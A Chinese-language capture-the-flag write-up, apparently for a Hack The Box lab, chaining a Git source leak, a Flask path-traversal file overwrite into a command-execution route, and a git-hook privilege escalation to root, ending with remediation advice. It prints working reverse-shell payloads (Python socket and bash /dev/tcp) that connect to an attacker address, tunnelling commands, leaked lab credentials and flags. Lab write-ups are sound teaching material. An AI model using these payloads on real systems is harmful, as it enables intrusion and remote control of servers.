Flask应用安全漏洞分析与利用：从Git泄露到Root权限提升<\/h1>

1. 信息收集阶段<\/h2>

1.1 目标识别<\/h3>

IP地址: 10.10.11.164<\/li>

开放端口:

22\/tcp: OpenSSH 7.6p1 Ubuntu<\/li>

80\/tcp: HTTP (Werkzeug\/2.1.2 Python\/3.10.3)<\/li> <\/ul> <\/li> <\/ul>

1.2 Web应用指纹识别<\/h3>

使用whatweb<\/code>识别Web技术栈:<\/p>

whatweb http:\/\/10.10.11.164\/
<\/span><\/span>whatweb http:\/\/10.10.11.164\/download
<\/span><\/span><\/code><\/pre>发现是一个基于Flask的上传服务，标题为"upcloud - Upload files for Free!"<\/p>
2. Git源码泄露利用<\/h2>
2.1 发现Git仓库<\/h3>
访问\/download<\/code>端点获取源码压缩包:<\/p>
wget http:\/\/10.10.11.164\/download -O source.zip
<\/span><\/span>unzip source.zip
<\/span><\/span><\/code><\/pre>2.2 分析Git历史<\/h3>
git branch
<\/span><\/span>git checkout dev
<\/span><\/span>git log
<\/span><\/span>git diff c41fedef2ec6df98735c11b2faf1e79ef492a0f3 ee9d9f1ef9156c787d53074493e39ae364cd1e05
<\/span><\/span><\/code><\/pre>关键发现:<\/p>

\/uploads<\/code>路由存在目录穿越漏洞<\/li>
发现开发凭据:

用户名: dev01<\/li>
密码: Soulless_Developer#2022<\/li>
<\/ul>
<\/li>
<\/ul>
3. Flask目录穿越与RCE漏洞利用<\/h2>
3.1 目录穿越漏洞<\/h3>
分析Dockerfile<\/code>和views.py<\/code>发现:<\/p>

应用会自动重载修改后的文件<\/li>
上传功能未正确过滤路径，导致可以覆盖任意文件<\/li>
<\/ul>
3.2 注入恶意路由<\/h3>
通过上传修改后的views.py<\/code>添加RCE端点:<\/p>
@app<\/span>.<\/span>route('\/shell'<\/span>)
<\/span><\/span>def<\/span> execute<\/span>():
<\/span><\/span>    shell =<\/span> request.<\/span>args.<\/span>get('shell'<\/span>)
<\/span><\/span>    if<\/span> shell:
<\/span><\/span>        return<\/span> subprocess.<\/span>check_output(shell.<\/span>strip(), shell=<\/span>True<\/span>)
<\/span><\/span>    return<\/span> "No command provided"<\/span>
<\/span><\/span><\/code><\/pre>3.3 执行远程命令<\/h3>
使用curl触发RCE:<\/p>
curl "http:\/\/10.10.11.164\/shell?shell=python3%20-c%20%27import%20os%2Cpty%2Csocket%3Bs%3Dsocket.socket%28%29%3Bs.connect%28%28%2210.10.16.28%22%2C443%29%29%3B%5Bos.dup2%28s.fileno%28%29%2Cf%29for%20f%20in%280%2C1%2C2%29%5D%3Bpty.spawn%28%22sh%22%29%27"<\/span>
<\/span><\/span><\/code><\/pre>4. Docker环境横向移动<\/h2>
4.1 上传工具<\/h3>
upload \/home\/maptnh\/Desktop\/htb\/chisel_1.10.1_linux_amd64 \/tmp
<\/span><\/span>chmod +x \/tmp\/chisel_1.10.1_linux_amd64
<\/span><\/span><\/code><\/pre>4.2 建立隧道<\/h3>
攻击机:<\/p>
chisel server --port 10000<\/span> -v --reverse --socks5
<\/span><\/span><\/code><\/pre>目标机:<\/p>
\/tmp\/chisel_1.10.1_linux_amd64 client 10.10.16.28:10000 R:1080:socks
<\/span><\/span><\/code><\/pre>4.3 扫描内网<\/h3>
proxychains nmap -p- 172.17.0.1 -Pn
<\/span><\/span><\/code><\/pre>发现3000端口运行Git服务<\/p>
5. Git服务利用<\/h2>
5.1 访问Git服务<\/h3>
使用之前发现的凭据登录:<\/p>
http:\/\/172.17.0.1:3000
username: dev01
password: Soulless_Developer#2022
<\/code><\/pre>
5.2 获取SSH私钥<\/h3>
从Git仓库获取用户私钥:<\/p>
http:\/\/opensource.htb:3000\/dev01\/home-backup
<\/code><\/pre>
转换私钥格式:<\/p>
openssl rsa -in id_rsa -out true_id_rsa
<\/span><\/span>chmod 600<\/span> true_id_rsa
<\/span><\/span><\/code><\/pre>5.3 SSH登录<\/h3>
ssh dev01@10.10.11.164 -i .\/true_id_rsa
<\/span><\/span><\/code><\/pre>获取user.txt: 0c88a3ca8e6dad3c9661362d435233b8<\/p>
6. 权限提升: Git Hook利用<\/h2>
6.1 发现Git同步脚本<\/h3>
cat \/usr\/local\/bin\/git-sync
<\/span><\/span><\/code><\/pre>发现系统会定期执行git同步操作<\/p>
6.2 创建恶意pre-commit钩子<\/h3>
vim \/home\/dev01\/.git\/hooks\/pre-commit
<\/span><\/span><\/code><\/pre>内容:<\/p>
#!\/bin\/bash
<\/span><\/span><\/span><\/span>\/bin\/bash -i >& \/dev\/tcp\/10.10.16.28\/10038 0>&1<\/span>
<\/span><\/span><\/code><\/pre>设置可执行权限:<\/p>
chmod +x \/home\/dev01\/.git\/hooks\/pre-commit
<\/span><\/span><\/code><\/pre>7. 最终权限提升: Tyrant利用<\/h2>
7.1 修改Git配置<\/h3>
cp config config.bak
<\/span><\/span><\/code><\/pre>修改.git\/config<\/code>:<\/p>
[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
    logallrefupdates = true
    fsmonitor = "\/bin\/bash -c '\/tmp\/tyrant'"
<\/code><\/pre>
7.2 使用Tyrant提权<\/h3>
.\/tyrant -uid 0<\/span> -rhost 10.10.16.28 -rport 10038<\/span>
<\/span><\/span><\/code><\/pre>获取root.txt: 60d907c88052f0d4b57a95e7b778f542<\/p>
漏洞总结与修复建议<\/h2>
漏洞链总结:<\/h3>

Git源码泄露 → 2. 硬编码凭据 → 3. 目录穿越 → 4. Flask RCE → 5. Docker逃逸 → 6. Git Hook提权<\/li>
<\/ol>
修复建议:<\/h3>

禁止.git目录的Web访问<\/li>
避免在代码中硬编码凭据<\/li>
实现严格的文件路径验证<\/li>
禁用动态代码执行功能<\/li>
限制Docker容器权限<\/li>
审计Git Hook和同步脚本的安全性<\/li>
<\/ol>

Flask应用安全漏洞分析与利用：从Git泄露到Root权限提升<\/h1>

1. 信息收集阶段<\/h2>

2. Git源码泄露利用<\/h2>

3. Flask目录穿越与RCE漏洞利用<\/h2>

4. Docker环境横向移动<\/h2>

5. Git服务利用<\/h2>

6. 权限提升: Git Hook利用<\/h2>

7. 最终权限提升: Tyrant利用<\/h2>

漏洞总结与修复建议<\/h2>

修复建议:<\/h3> 禁止.git目录的Web访问<\/li> 避免在代码中硬编码凭据<\/li> 实现严格的文件路径验证<\/li> 禁用动态代码执行功能<\/li> 限制Docker容器权限<\/li> 审计Git Hook和同步脚本的安全性<\/li> <\/ol>

修复建议:<\/h3>

禁止.git目录的Web访问<\/li>
避免在代码中硬编码凭据<\/li>
实现严格的文件路径验证<\/li>
禁用动态代码执行功能<\/li>
限制Docker容器权限<\/li>
审计Git Hook和同步脚本的安全性<\/li> <\/ol>